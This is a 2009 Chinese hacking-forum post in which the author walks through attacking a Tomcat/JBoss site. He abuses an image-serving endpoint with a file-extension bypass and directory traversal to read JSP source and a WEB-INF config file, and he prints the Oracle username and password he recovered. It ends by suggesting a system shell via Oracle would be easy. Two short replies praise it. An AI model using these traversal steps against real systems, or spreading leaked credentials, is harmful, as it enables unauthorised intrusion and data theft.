渗一个站,笔记一下

6678 2
silence 2009-8-17 11:57:02 | 显示全部楼层 |阅读模式
我精减一下内容贴出来:



tomcat+jboss,站点交互功能很少,漏洞扫描器没发现什么问题。

手工一个一个文件慢慢翻,翻了好多发现有的文章提示“没有图片”,也就是说可能有的文章附有图片了。一个个找终于看到一张图片,右键查看一下图片URL,发现有些可疑:

http://webhost/AjaxAction.do?act ... 01110623085223t.jpg



试一下改变成:

http://webhost/AjaxAction.do?actionType=showimage&id=111



出错了:

java.io.IOException: 文件不是图片格式,请检查后继续!只能输出gif、jpg、png三种格式文件!
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:68)
cn.com.chx.eform.AjaxAction.showImage(AjaxAction.java:265)


再试试有没有过滤结束符构造一个合法的:

http://webhost/AjaxAction.do?act ... &id=111.gif



非常有意思,不但得到了web path而且还成功欺骗了程序:

java.io.FileNotFoundException: E:\webhost\server\default\deploy\root.war\WEB-INF\resource\111?3;.gif (系统找不到指定的文件。)
java.io.FileInputStream.open(Native Method)
java.io.FileInputStream.<init>(FileInputStream.java:106)
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:74) 再试试能不能返回上级目录,因为上面暴出了web path,所以退只要两格:http://webhost/AjaxAction.do?act ... ../../login.jsp.gif 哈哈,直接看到了jsp源码~~~接下来可以去尝试读一下web-inf下面的xml文件:http://webhost/AjaxAction.do?act ... /chx-config.xml.gif 找到了最重要的oracle密码(直接访问xml访问不了):- <database>  <type>oracle</type>   <jdbcdriver>oracle.jdbc.driver.OracleDriver</jdbcdriver>   <url>jdbcracle:thinlocalhost:1521rcl</url>   <user>xbox</user>   <password>xbox123qwe@#$_web</password>   </database> 做渗透测试项目就做到这就可以了,接下来要绕过fw利用oracle获得个systemshell也并非难事
维护祖国尊严  爱我中华 强我中华 耀我中华
飞龙 2009-8-17 20:12:48 | 显示全部楼层
收藏了,顶下
不要轻言放弃.失败乃成功他亲娘.没有永远的菜鸟.
小黑不黑 2009-8-17 21:40:04 | 显示全部楼层
不错~~学习下
潜心修炼……
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行